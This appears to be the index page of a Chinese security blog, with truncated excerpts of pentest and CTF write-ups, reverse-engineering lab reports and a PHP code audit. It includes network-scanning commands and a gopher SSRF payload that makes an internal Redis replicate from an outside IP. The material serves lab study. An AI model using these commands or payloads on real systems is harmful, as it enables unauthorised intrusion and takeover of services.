渗透笔记 外网打点网络扫描123456789101112131415161718cme smb <ip_range> # 使用 CrackMapExec (cme) 扫描 SMB 存活主机nmap -sP <ip> # 使用 Nmap 进行 Ping 扫描(检测主机是否存活)nmap -PN -sV --top-ports 50 --open <ip> # 2025-04-22 #web #渗透
某公司二面靶场记录 Web1Flag1ssrf直接读/flag Flag2dict探测内网数据库端口 只有1和7的6379 7存在未授权 题目提示flag2在数据库里,直接读 Flag3ssrf打内网redis未授权 用redis-ssrf 1gopher://172.18.240.7:6379/_%2A3%0D%0A%247%0D%0ASLAVEOF%0D%0A%2414%0D%0A124.70.209. 2025-04-18 #web #wp #面试 #靶场
HENU22级逆向分析技术期末考试 第一题先F8直到通用寄存器只有ESP为红色时 右键ESP,选择HW break [ESP] 然后f9运行 然后一直F8单步,知道发现retn返回到入口点,这里需要ctrl+a分析 脱壳 脱壳成功 第二题用ida打开2212080174.exe 查看sub_401005最里面的函数 将输入的用户名和密码存入到了数组v6中 查看sub_40100A最里面的函数 关键在(*(_DWORD 2025-04-11 #逆向 #考试
逆向分析实验4 手动脱壳 手动脱壳查找尾部跳转指令使用OllyDbg分析Lab18-01.exe程序,通过查找尾部跳转指令JMP找到程序的入口点OEP,完成手动脱壳 在下面发现尾部跳转指令 F4运行到此处后,F8步入跳转,找到入口点0040154f 脱壳 运行生成的exe文件 打开ImportREC 选择刚运行的进程,依次点击 自动搜索 获取输入表 修复转存文件即可 用PEID检查,脱壳成功 堆栈平衡原理使 2025-03-19 #实验
THM CyberLens [THM] CyberLensGetshellnmap扫描 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899 2025-03-08 #THM
逆向分析实验2 OllyDbg的使用 逆向分析实验2 OllyDbg的使用查找main()函数单步跟踪先一直使用F8单步步过,发现运行了401144处的函数调用后出现弹窗: 重新运行,并用命令bp 401144在目标函数位置打上断点 运行到断点后F7单步步入 此函数中调用了MessageBox()函数,并且存在MessageBox()函数中出现的Hello World!和www.reversecore.com字符串 因此可以确定此 2025-03-01 #实验
关于GZCTF平台ip更改后题目容器ip未变的解决办法 关于GZCTF平台ip更改后题目容器ip未变的解决办法将appsettings.json中的PublicEntry值改为当前ip 执行 12systemctl daemon-reloadsystemctl restart docker 解决。 2025-01-12 #solution
xhcms代码审计 xhcms代码审计先用seay自动审计,然后一个个查看验证 文件包含/index.php和/admin/index.php是一样的代码: 1234567<?php//单一入口模式error_reporting(0); //关闭错误显示$file=addslashes($_GET['r']); //接收文件名$action=$file==''? 2024-11-24 #web #php #代码审计
春秋云镜-Initial 春秋云镜-Initialflag1打开网站,发现是个xx管理系统页面 用fscan扫一下 1234567891011121314151617PS D:\tools\fscan> ./fscan -h 39.101.204.146 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_ 2024-10-27 #web #渗透
SUCTF2018 annonymous [SUCTF 2018]annonymous12345678910111213<?php$MY = create_function("","die(`cat flag.php`);"); //创建匿名函数$hash = bin2hex(openssl_random_pseudo_bytes(32)); //生成随机哈希值eval("f 2024-07-28 #web #php